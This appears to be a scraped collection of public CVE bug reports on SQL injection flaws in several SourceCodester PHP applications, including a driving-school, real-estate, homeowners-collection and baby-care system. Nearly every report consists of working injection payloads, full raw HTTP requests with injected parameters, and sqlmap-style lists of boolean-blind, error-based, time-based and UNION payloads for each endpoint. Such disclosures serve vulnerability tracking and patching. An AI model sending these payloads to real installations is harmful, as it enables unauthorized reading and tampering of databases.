Car Driving School Management System v1.0 was discovered to contain a SQL injection vulnerability via /cdsms/classes/Master.php?f=delete_enrollment.

Permalink

Cannot retrieve contributors at this time

**Car driving school management system has a SQL injection vulnerability.**

vendors: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html

Vulnerability file: /cdsms/classes/Master.php?f=delete\_enrollment

Vulnerability location: /cdsms/classes/Master.php?f=delete\_enrollment, id

\[+\]Payload: id=5' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /cdsms/classes/Master.php?f=delete_enrollment HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/cdsms/admin/?page=enrollees
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=5' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=5' RLIKE (SELECT (CASE WHEN (2063=2063) THEN 5 ELSE 0x28 END))-- tmvi
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=5' AND EXTRACTVALUE(3533,CONCAT(0x5c,0x71767a6b71,(SELECT (ELT(3533\=3533,1))),0x716a6b7871))\-- tQbt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=5' AND (SELECT 1981 FROM (SELECT(SLEEP(5)))mXOm)-- Mmee
\---

CVE-2022-28413: bug_report/SQLi-2.md at main · k0xx11/bug_report

Car Driving School Managment System v1.0 was discovered to contain a SQL injection vulnerability via /cdsms/classes/Master.php?f=delete_package.

Permalink

Cannot retrieve contributors at this time

**Car driving school management system has a SQL injection vulnerability.**

vendors: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html

Vulnerability file: /cdsms/classes/Master.php?f=delete\_package

Vulnerability location: /cdsms/classes/Master.php?f=delete\_package ,id

\[+\]Payload: id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /cdsms/classes/Master.php?f=delete_package HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/cdsms/admin/?page=packages
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1' RLIKE (SELECT (CASE WHEN (1015=1015) THEN 1 ELSE 0x28 END))-- lYIO
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=1' AND EXTRACTVALUE(9451,CONCAT(0x5c,0x716a6a7071,(SELECT (ELT(9451\=9451,1))),0x716b706b71))\-- FYNY

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1' AND (SELECT 2853 FROM (SELECT(SLEEP(5)))ZgVu)-- duUy
\---

CVE-2022-28412: bug_report/SQLi-1.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/classes/Master.php?f=delete_estate.

Permalink

Cannot retrieve contributors at this time

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/classes/Master.php?f=delete\_estate

Vulnerability location: /reps/classes/Master.php?f=delete\_estate , id

\[+\] Payload: id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point

    POST /reps/classes/Master.php?f=delete_estate HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/reps/admin/?page=amenities
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=7' RLIKE (SELECT (CASE WHEN (9646=9646) THEN 7 ELSE 0x28 END))-- qdhX
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=7' AND EXTRACTVALUE(8654,CONCAT(0x5c,0x7162767a71,(SELECT (ELT(8654\=8654,1))),0x71717a7871))\-- JBQn

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=7' AND (SELECT 1732 FROM (SELECT(SLEEP(5)))VLjc)-- LToO
\---

CVE-2022-28030: bug_report/SQLi-3.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/classes/Master.php?f=delete_type.

Permalink

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/classes/Master.php?f=delete\_type

Vulnerability location: /reps/classes/Master.php?f=delete\_type , id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point

    POST /reps/classes/Master.php?f=delete_type HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/reps/admin/?page=types
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=2' RLIKE (SELECT (CASE WHEN (7750=7750) THEN 2 ELSE 0x28 END))-- wAyE
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2' AND (SELECT 5093 FROM(SELECT COUNT(\*),CONCAT(0x716a7a6271,(SELECT (ELT(5093\=5093,1))),0x71706b7671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- vBmh

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=2' AND (SELECT 4716 FROM (SELECT(SLEEP(5)))NHrz)-- bhFd
\---

CVE-2022-28029: bug_report/SQLi-2.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/classes/Master.php?f=delete_amenity.

Permalink

Cannot retrieve contributors at this time

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/classes/Master.php?f=delete\_amenity

Vulnerability location: /reps/classes/Master.php?f=delete\_amenity , id

\[+\] Payload: id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point

    POST /reps/classes/Master.php?f=delete_amenity HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/reps/admin/?page=amenities
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=7' RLIKE (SELECT (CASE WHEN (8101=8101) THEN 7 ELSE 0x28 END))-- gXyQ
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=7' AND (SELECT 6381 FROM(SELECT COUNT(\*),CONCAT(0x7170787a71,(SELECT (ELT(6381\=6381,1))),0x716b6a6b71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- LaZi

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=7' AND (SELECT 2258 FROM (SELECT(SLEEP(5)))pvPg)-- dMCC
\---

CVE-2022-28028: bug_report/SQLi-1.md at main · k0xx11/bug_report

Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via /hocms/classes/Master.php?f=delete_phase.

Permalink

Cannot retrieve contributors at this time

**Home Owners Collection Management System has SQL injection vulnerability**

vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html

Vulnerability file: /hocms/classes/Master.php?f=delete\_phase

Vulnerability location: /hocms/classes/Master.php?f=delete\_phase,id

\[+\]Payload: id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /hocms/classes/Master.php?f=delete_phase HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/hocms/admin/?page=phases
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1' RLIKE (SELECT (CASE WHEN (3093=3093) THEN 1 ELSE 0x28 END))-- TVaW
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9655 FROM(SELECT COUNT(\*),CONCAT(0x716a787a71,(SELECT (ELT(9655\=9655,1))),0x71786a7071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- rFkx

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1' AND (SELECT 5645 FROM (SELECT(SLEEP(5)))IsZT)-- rkXc
\---

CVE-2022-28417: bug_report/SQLi-4.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&find=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&find=

Vulnerability location: /BabyCare/admin.php?id=posts&find= //find is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&find=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //find is Injection point

GET /BabyCare/admin.php?id\=posts&find\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: find (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&find\=3' RLIKE (SELECT (CASE WHEN (6593=6593) THEN 3 ELSE 0x28 END))-- zXvu
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&find=3' AND (SELECT 3959 FROM(SELECT COUNT(\*),CONCAT(0x7170787071,(SELECT (ELT(3959\=3959,1))),0x7178787171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- IVWt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&find\=3' AND (SELECT 4643 FROM (SELECT(SLEEP(5)))bafh)-- GSoV
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=posts&find=3' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x65476d614a4d4d69526c636a4e486f436b45485a67484d67736e4e47657a654761684c644d734557,0x7178787171),NULL#
\--\-

CVE-2022-28424: bug_report/SQLi-5.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=edit.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=edit

Vulnerability location: /BabyCare/admin.php?id=posts&action=edit&postid=2 //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=edit&postid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=edit&postid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=posts&action\=edit&postid\=2' AND 7502=7502 AND 'Yurq'\='Yurq

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 6867 FROM(SELECT COUNT(\*),CONCAT(0x7162786a71,(SELECT (ELT(6867=6867,1))),0x7170767071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'huoz'\='huoz

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 5804 FROM (SELECT(SLEEP(5)))ZBUN) AND 'nxGO'\='nxGO

    Type: UNION query
    Title: Generic UNION query (NULL) \- 8 columns
    Payload: id\=posts&action\=edit&postid\=\-9180' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162786a71,0x4e436b74735063624a4164484d4f675676736e68467951525141677146614f56476b524f66456f50,0x7170767071),NULL,NULL,NULL,NULL-- -
\---

CVE-2022-28422: bug_report/SQLi-3.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via BabyCare/admin.php?id=theme&setid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/theme.php

Vulnerability location: BabyCare/admin.php?id=theme&setid= //setid is Injection point

\[+\]Payload: setid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ //setid is Injection point

GET /BabyCare/admin.php?id\=theme&setid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: setid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=theme&setid\=1' AND 4666=4666 AND 'rScZ'\='rScZ

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=theme&setid\=1' AND (SELECT 1518 FROM(SELECT COUNT(\*),CONCAT(0x7171707671,(SELECT (ELT(1518=1518,1))),0x7176717671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'KBjM'\='KBjM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=theme&setid\=1' AND (SELECT 8964 FROM (SELECT(SLEEP(5)))SZjt) AND 'pISR'\='pISR
\--\-

CVE-2022-28420: bug_report/SQLi-1.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin.php?id=posts&action=display&value=1&postid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/post.php 

Vulnerability location: /BabyCare/admin.php?id=posts&action=display&value=1&postid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=display&value=1&postid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=display&value\=1&postid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=display&value\=1&postid\=1' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 1 ELSE 0x28 END))-- GiVX
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&action=display&value=1&postid=1' AND (SELECT 7280 FROM(SELECT COUNT(\*),CONCAT(0x71627a7071,(SELECT (ELT(7280\=7280,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- PXXk

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=display&value\=1&postid\=1' AND (SELECT 3574 FROM (SELECT(SLEEP(5)))SpIf)-- qCfa
\---

Tag

#chrome